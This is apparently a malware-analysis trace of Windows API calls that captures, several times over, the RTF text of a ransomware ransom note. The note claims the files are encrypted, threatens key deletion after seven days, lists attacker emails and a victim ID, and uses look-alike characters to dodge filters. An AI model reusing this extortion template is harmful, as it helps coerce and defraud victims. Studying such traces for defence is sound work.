fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.740] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.740] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 